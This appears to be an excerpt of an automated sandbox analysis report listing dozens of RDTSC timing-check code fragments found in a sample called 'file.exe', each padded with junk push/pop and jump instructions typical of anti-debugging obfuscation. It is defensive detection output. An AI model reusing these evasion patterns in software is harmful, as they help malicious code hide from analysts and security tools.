Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7D332 second address: F7D33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC2C8DD5EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7D33C second address: F7D360 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007FC2C8B99096h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7D8FF second address: F7D91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC2C8DD5F02h 0x0000000a pop esi 0x0000000b push ebx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8501C second address: F85047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ecx 0x0000000a jmp 00007FC2C8B9909Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC2C8B9909Ch 0x00000016 jnl 00007FC2C8B99096h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84132 second address: F8413A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8413A second address: F84143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F845B8 second address: F845DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC2C8DD5F05h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push esi 0x0000000c jg 00007FC2C8DD5EF6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8471A second address: F84735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2C8B990A5h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84735 second address: F84739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F848A6 second address: F848C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC2C8B990A2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F848C0 second address: F848D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2C8DD5EFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F848D2 second address: F848DC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC2C8B99096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F848DC second address: F848E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84A53 second address: F84A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F31E74 second address: F31E99 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC2C8DD5F0Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F31E99 second address: F31E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84E89 second address: F84E97 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F84E97 second address: F84E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54794 second address: F54799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54799 second address: F547A3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC2C8B9909Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54862 second address: F54871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54871 second address: F54877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54877 second address: F548CA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC2C8DD5F07h 0x00000008 jmp 00007FC2C8DD5F01h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov dx, 10E9h 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FC2C8DD5EF8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov cx, 8581h 0x00000034 movsx edx, si 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jo 00007FC2C8DD5EF6h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F548CA second address: F548D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F548D0 second address: F548D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54D45 second address: F54D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54F55 second address: F54F5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54F5A second address: F54F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54F60 second address: F54F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC2C8DD5EFBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54F75 second address: F54FB3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC2C8B99098h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FC2C8B990A7h 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007FC2C8B9909Ch 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54FB3 second address: F54FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F550C4 second address: F550CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F550CA second address: F550E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC2C8DD5F00h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F550E3 second address: F55134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FC2C8B99098h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jnl 00007FC2C8B990A1h 0x0000002b lea eax, dword ptr [ebp+12479C7Ah] 0x00000031 mov dword ptr [ebp+12443748h], edi 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F55134 second address: F55138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F55138 second address: F5513E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5513E second address: F55143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F55143 second address: F5516C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B990A1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007FC2C8B99096h 0x00000016 jp 00007FC2C8B99096h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5516C second address: F31E74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+124412D8h], esi 0x00000010 lea eax, dword ptr [ebp+12479C36h] 0x00000016 jmp 00007FC2C8DD5F03h 0x0000001b mov dword ptr [ebp+122D1C51h], edi 0x00000021 push eax 0x00000022 jmp 00007FC2C8DD5EFDh 0x00000027 mov dword ptr [esp], eax 0x0000002a sub dword ptr [ebp+122D1CE8h], eax 0x00000030 call dword ptr [ebp+122D3113h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 jmp 00007FC2C8DD5F01h 0x0000003e pop eax 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F88D43 second address: F88D4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F88D4D second address: F88D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F31EBA second address: F31EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F31EC0 second address: F31EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F88FED second address: F88FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F88FF1 second address: F8900B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC2C8DD5F04h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F89251 second address: F89255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F893FE second address: F89419 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC2C8DD5EFFh 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F89419 second address: F89423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F89423 second address: F8943D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8DD5F04h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F896E0 second address: F896E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F896E4 second address: F896EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F896EC second address: F8970B instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2C8B99098h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FC2C8B9909Ch 0x00000014 push ebx 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8970B second address: F89710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F89710 second address: F89718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F93E7A second address: F93E88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC2C8DD5EFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F92C55 second address: F92C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FC2C8B99096h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F92C62 second address: F92C68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F92C68 second address: F92C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F92C6F second address: F92C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F93320 second address: F93353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B990A5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC2C8B990A7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F93353 second address: F93357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F93357 second address: F9337C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC2C8B99096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jne 00007FC2C8B99096h 0x00000016 jmp 00007FC2C8B9909Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9337C second address: F93382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F93382 second address: F93390 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B9909Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93390 second address: F93396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92981 second address: F92994 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC2C8B99098h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b jnp 00007FC2C8B99096h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92994 second address: F929A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F929A1 second address: F929C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F929C0 second address: F929C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F929C4 second address: F929CE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC2C8B99096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F929CE second address: F929D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93652 second address: F93658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F937B9 second address: F937C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93906 second address: F9390A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9390A second address: F93910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93910 second address: F93930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FC2C8B990A8h 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93930 second address: F93936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93936 second address: F9393A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99E2E second address: F99E4A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC2C8DD5EFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FC2C8DD5EF6h 0x00000010 jng 00007FC2C8DD5EF6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99E4A second address: F99E84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jbe 00007FC2C8B99096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FC2C8B990A7h 0x00000014 pushad 0x00000015 jmp 00007FC2C8B9909Fh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99E84 second address: F99EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC2C8DD5F06h 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FC2C8DD5EF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9A2A4 second address: F9A2A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9A2A8 second address: F9A2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9A2B0 second address: F9A2B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C831 second address: F9C845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 je 00007FC2C8DD5EF6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FC2C8DD5EF6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C845 second address: F9C849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C849 second address: F9C862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FC2C8DD5EFCh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C862 second address: F9C868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C868 second address: F9C872 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC2C8DD5EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5856 second address: FA5866 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC2C8B99096h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4330 second address: FA4336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4336 second address: FA434C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC2C8B990A1h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA434C second address: FA4356 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC2C8DD5EFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4717 second address: FA4726 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC2C8B99098h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54AAF second address: F54AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54AB4 second address: F54ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
